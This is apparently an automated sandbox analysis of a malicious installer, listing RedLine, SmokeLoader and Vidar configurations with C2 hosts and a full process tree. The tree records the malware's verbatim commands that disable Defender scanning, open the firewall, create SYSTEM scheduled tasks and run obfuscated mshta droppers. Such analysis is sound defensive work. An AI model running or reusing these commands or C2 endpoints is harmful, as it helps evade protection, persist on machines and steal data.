Resubmissions
13-10-2021 18:35
211013-w8lxmaegdr 1013-10-2021 12:38
211013-pvkdbadhdm 1013-10-2021 05:30
211013-f7nrtsdfa3 1012-10-2021 20:25
211012-y7qwasdbh4 1011-10-2021 21:02
211011-zvywtaabdq 10Analysis
-
max time kernel
36s -
max time network
603s -
platform
windows10_x64 -
resource
win10-ja-20210920 -
submitted
11-10-2021 21:02
General
-
Target
setup_x86_x64_install.exe
-
Size
3.4MB
-
MD5
26f28bf2dc2b6afc0dd99cb6ea3879b8
-
SHA1
9270b9f48e2d14cc2cbed61ee2e2389d5f69ce05
-
SHA256
5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa
-
SHA512
5a350373e87673c9ba39e5353bea1d7c1f2f7bc62a703ed13e892e69037008f3e2accadbdd0ec0bd976e54c68b79dfad6fb37517dd55448cac4d9d74ae8a037b
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
she
C2
135.181.129.119:4805
Extracted
Family
smokeloader
Version
2020
C2
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
41.2
Botnet
933
C2
https://mas.to/@serg4325
Attributes
-
profile_id
933
Extracted
Family
vidar
Version
41.3
Botnet
903
C2
https://mas.to/@oleg98
Attributes
-
profile_id
903
Extracted
Family
vidar
Version
41.3
Botnet
937
C2
https://mas.to/@oleg98
Attributes
-
profile_id
937
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Zbot Generic URI/Header Struct .bin
suricata: ET MALWARE Zbot Generic URI/Header Struct .bin
-
Vidar Stealer 6 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Executes dropped EXE 29 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 11 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 4 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS444B4626\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon20762bc3f6.exeMon20762bc3f6.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon206b909958ed4.exeMon206b909958ed4.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 6606⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 6766⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 7366⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 8006⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 8886⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 9326⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 11046⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon20927aab1e5.exeMon20927aab1e5.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon20927aab1e5.exeC:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon20927aab1e5.exe6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon204014f13870f5e.exeMon204014f13870f5e.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon203f01ac7e6.exeMon203f01ac7e6.exe5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon203f01ac7e6.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon203f01ac7e6.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon203f01ac7e6.exe" ) do taskkill /F -Im "%~NxU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I14⤵
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Mon203f01ac7e6.exe"8⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon206d48916f93c5.exeMon206d48916f93c5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209c830507d573.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon209c830507d573.exeMon209c830507d573.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon209c830507d573.exeC:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon209c830507d573.exe6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon2083f8d8970a0b2d.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon2083f8d8970a0b2d.exeMon2083f8d8970a0b2d.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon20d3b8b752.exeMon20d3b8b752.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\nK4aaCZE4tQcuszEO9z3RTLI.exe"C:\Users\Admin\Pictures\Adobe Films\nK4aaCZE4tQcuszEO9z3RTLI.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Pictures\Adobe Films\G9TYRlaApopi8cBjImqUDrvl.exe"C:\Users\Admin\Pictures\Adobe Films\G9TYRlaApopi8cBjImqUDrvl.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\lxrZiEBramHe2BAjuCCTKiJi.exe"C:\Users\Admin\Pictures\Adobe Films\lxrZiEBramHe2BAjuCCTKiJi.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\lxrZiEBramHe2BAjuCCTKiJi.exe"C:\Users\Admin\Pictures\Adobe Films\lxrZiEBramHe2BAjuCCTKiJi.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\jDMSD6g_EX4gKVdl_JbMmmF6.exe"C:\Users\Admin\Pictures\Adobe Films\jDMSD6g_EX4gKVdl_JbMmmF6.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\vGhC45pqhnitqILzacnZ8CyD.exe"C:\Users\Admin\Pictures\Adobe Films\vGhC45pqhnitqILzacnZ8CyD.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\n4FV9LQITwmEylG4dOm5bKxS.exe"C:\Users\Admin\Pictures\Adobe Films\n4FV9LQITwmEylG4dOm5bKxS.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\n4FV9LQITwmEylG4dOm5bKxS.exe"C:\Users\Admin\Pictures\Adobe Films\n4FV9LQITwmEylG4dOm5bKxS.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\FcvbR343t0fq4Wn0bZuqFG1O.exe"C:\Users\Admin\Pictures\Adobe Films\FcvbR343t0fq4Wn0bZuqFG1O.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\E9FO1J_6uvSoAeK3rIcpnFrE.exe"C:\Users\Admin\Pictures\Adobe Films\E9FO1J_6uvSoAeK3rIcpnFrE.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\LQ9ikJeXLwUr7dqRPFIfAlt2.exe"C:\Users\Admin\Pictures\Adobe Films\LQ9ikJeXLwUr7dqRPFIfAlt2.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\LQ9ikJeXLwUr7dqRPFIfAlt2.exe"C:\Users\Admin\Pictures\Adobe Films\LQ9ikJeXLwUr7dqRPFIfAlt2.exe"7⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 17567⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0UHDLBG2hkCZO3lVcz1r88BN.exe"C:\Users\Admin\Pictures\Adobe Films\0UHDLBG2hkCZO3lVcz1r88BN.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\xHp7KHlTtGAWndAvUGywfgyD.exe"C:\Users\Admin\Pictures\Adobe Films\xHp7KHlTtGAWndAvUGywfgyD.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\IOKTLFZf3JUKpImEahj0iLmJ.exe"C:\Users\Admin\Pictures\Adobe Films\IOKTLFZf3JUKpImEahj0iLmJ.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\5992890b-7128-476b-a22d-a8ee3419ba3a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5992890b-7128-476b-a22d-a8ee3419ba3a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5992890b-7128-476b-a22d-a8ee3419ba3a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run7⤵
-
C:\Users\Admin\AppData\Local\Temp\5992890b-7128-476b-a22d-a8ee3419ba3a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5992890b-7128-476b-a22d-a8ee3419ba3a\AdvancedRun.exe" /SpecialRun 4101d8 66728⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\IOKTLFZf3JUKpImEahj0iLmJ.exe" -Force7⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\IOKTLFZf3JUKpImEahj0iLmJ.exe" -Force7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\IOKTLFZf3JUKpImEahj0iLmJ.exe"C:\Users\Admin\Pictures\Adobe Films\IOKTLFZf3JUKpImEahj0iLmJ.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\eMQgNSztaN6oyoijq6QyFQKC.exe"C:\Users\Admin\Pictures\Adobe Films\eMQgNSztaN6oyoijq6QyFQKC.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\eMQgNSztaN6oyoijq6QyFQKC.exe"C:\Users\Admin\Pictures\Adobe Films\eMQgNSztaN6oyoijq6QyFQKC.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4ayFPPPanDu_Sh2LOTawhisg.exe"C:\Users\Admin\Pictures\Adobe Films\4ayFPPPanDu_Sh2LOTawhisg.exe"6⤵
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\Pictures\Adobe Films\pQjUUOA4lO2WIokCIKkU45AC.exe"C:\Users\Admin\Pictures\Adobe Films\pQjUUOA4lO2WIokCIKkU45AC.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\T10nlJzuGkZaNPh6Fg2pywQn.exe"C:\Users\Admin\Pictures\Adobe Films\T10nlJzuGkZaNPh6Fg2pywQn.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\9ENuRqCKtFJabq2jSWJ3H4NV.exe"C:\Users\Admin\Pictures\Adobe Films\9ENuRqCKtFJabq2jSWJ3H4NV.exe"6⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3636.0.1477128407\1121882873" -parentBuildID 20200403170909 -prefsHandle 1436 -prefMapHandle 1428 -prefsLen 1 -prefMapSize 219808 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3636 "\\.\pipe\gecko-crash-server-pipe.3636" 1508 gpu9⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3636.3.1891800210\101154129" -childID 1 -isForBrowser -prefsHandle 5640 -prefMapHandle 5636 -prefsLen 186 -prefMapSize 219808 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3636 "\\.\pipe\gecko-crash-server-pipe.3636" 5652 tab9⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3636.13.1628485684\65691356" -childID 2 -isForBrowser -prefsHandle 4888 -prefMapHandle 5056 -prefsLen 7358 -prefMapSize 219808 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3636 "\\.\pipe\gecko-crash-server-pipe.3636" 4328 tab9⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3636.20.619558217\733132888" -childID 3 -isForBrowser -prefsHandle 3244 -prefMapHandle 3160 -prefsLen 7358 -prefMapSize 219808 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3636 "\\.\pipe\gecko-crash-server-pipe.3636" 4696 tab9⤵
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"7⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffe658d4f50,0x7ffe658d4f60,0x7ffe658d4f708⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1696 /prefetch:28⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2036 /prefetch:88⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2428 /prefetch:88⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2812 /prefetch:18⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2796 /prefetch:18⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:18⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:18⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4600 /prefetch:88⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1684,6386477672544372376,15141329817815753588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4732 /prefetch:88⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 3208 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\Adobe Films\9ENuRqCKtFJabq2jSWJ3H4NV.exe"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 32088⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 3208 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\Adobe Films\9ENuRqCKtFJabq2jSWJ3H4NV.exe"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 32088⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_NSVp7TF_PP_1yvQhQEQuqvn.exe"C:\Users\Admin\Pictures\Adobe Films\_NSVp7TF_PP_1yvQhQEQuqvn.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\dAqxabAhJ3yZixnae027d4DG.exe"C:\Users\Admin\Pictures\Adobe Films\dAqxabAhJ3yZixnae027d4DG.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\_gb7CqWeunhNM_7lvUgMe2NV.exe"C:\Users\Admin\Pictures\Adobe Films\_gb7CqWeunhNM_7lvUgMe2NV.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MjpFiZVjH.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MjpFiZVjH.exe"7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM8⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\9⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes9⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes9⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NN7x7xlUxOSrWcAdAVHYdVIR.exe"C:\Users\Admin\Pictures\Adobe Films\NN7x7xlUxOSrWcAdAVHYdVIR.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--DzBsjyZ8js"8⤵
-
